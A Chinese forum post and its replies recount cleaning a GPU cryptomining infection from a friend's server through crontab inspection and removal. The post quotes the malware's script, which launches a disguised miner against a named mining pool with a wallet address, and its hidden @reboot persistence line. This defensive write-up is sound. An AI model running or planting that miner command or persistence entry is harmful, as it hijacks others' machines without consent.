记一次挖矿病毒清除记录(很水)
> 本帖最后由 执念e1 于 2022-4-14 12:53 编辑**分析背景**
一个朋友做机器学习的机器疑似中了挖矿,显卡被python起来的进程100%占用。每次杀死进程后重启,进程就回来了,让给看看排查一下。这篇文章会很水,只有几条简单的命令,后续并没有对入侵路径进行回溯。但还是抱着分享的心态写一下,希望对没接触过的部分朋友有帮助。
**机器状态**
如下图,查看显卡的状态,几个python进程百分之百占用。
使用top命令看一下
其实上面两图都是朋友发过来的,直接看图也没法定位出具体问题来。
然后跟朋友要了vpn和机器的账号密码直接root登录。
**排查过程**
因为朋友说重启后显卡还是被占用状态。
直接执行
`crontab -l`
看下是否有可以进程,一步到位。看这个路径形式,基本有谱了。又问了一下朋友最早发现显卡状态的时间与upd文件写入的时间,基本吻合。
查看了下.unix-front路径,存在这些文件。
在其中某个文件里面发现如下代码
```shell
if [ ! -d "proxy" ]; then proxy=`cat proxy` $ifsudo nohup ./python -a ethash -o stratum+ssl://node.universitynetservice1979.info:12020 -u 0xfff23333c1cb3a3c9db8a0d781383cdc2c00b6da.$User --proxy $proxy>>/dev/null & else $ifsudo nohup ./python -a ethash -o stratum+ssl://node.universitynetservice1979.info:12020 -u 0xfff23333c1cb3a3c9db8a0d781383cdc2c00b6da.$User >>/dev/null & fi
```
其实看到这个协议基本就稳了,占用显卡挖矿的病毒就是这个导致的。
**清除善后**
执行如下指令,清空原来的开机自启动的配置。
`crontab -r`
当然,删除之前一定保留下原来的配置,虽然这次基本稳当了。但万一在处理客户系统时候删错,因此宕机,没法恢复,就凉凉了。
`@reboot /bin/.unix-font/upd >/dev/null 2>&1`
删除后,reboot重启机器,发现显卡降了下来,
确定了是这个自启动的原因,直接删除。
捎带看了一眼/etc/passwd文件,发现存在一个可疑账户,问了下,都没见过,使用pwck修复/etc/passwd文件然后直接删除。
其他关于溯源,正常来说是要分析一下溯源,他们之前已经进行了很多操作了,一些日志也被破坏了。加上毕竟友情协助,就到这里啦。
希望对大家有一丝的帮助 https://xz.aliyun.com/t/11102
大佬写的个挖矿检测心得,有兴趣的可以看看,我这看了几下就头疼,以后自己碰到了在说吧 过两天如果没事的话预计会出一篇关于漏洞复现的帖子
到时候大佬们来交流交流哈 我机器前两天也被挖坑了。。。。不知道是什么原因,已经停了换服务器,反正也是快到期的 排版有点乱,是编辑器的问题吗?
我处理了一下,好像有些图片没用上
王一之 发表于 2022-4-14 14:37
排版有点乱,是编辑器的问题吗?
我处理了一下,好像有些图片没用上
不知道,最下面几张图片本来已经删了,但是发出来发现在最下面,点开编辑也没显示有,试了几次就没多管了 执念e1 发表于 2022-4-14 15:27
不知道,最下面几张图片本来已经删了,但是发出来发现在最下面,点开编辑也没显示有,试了几次就没多管了 ...
好像要返回默认的编辑器编辑一次 哥哥原创的码
还是挺厉害的! 这里是要发展成吾爱的态势?
页:
[1]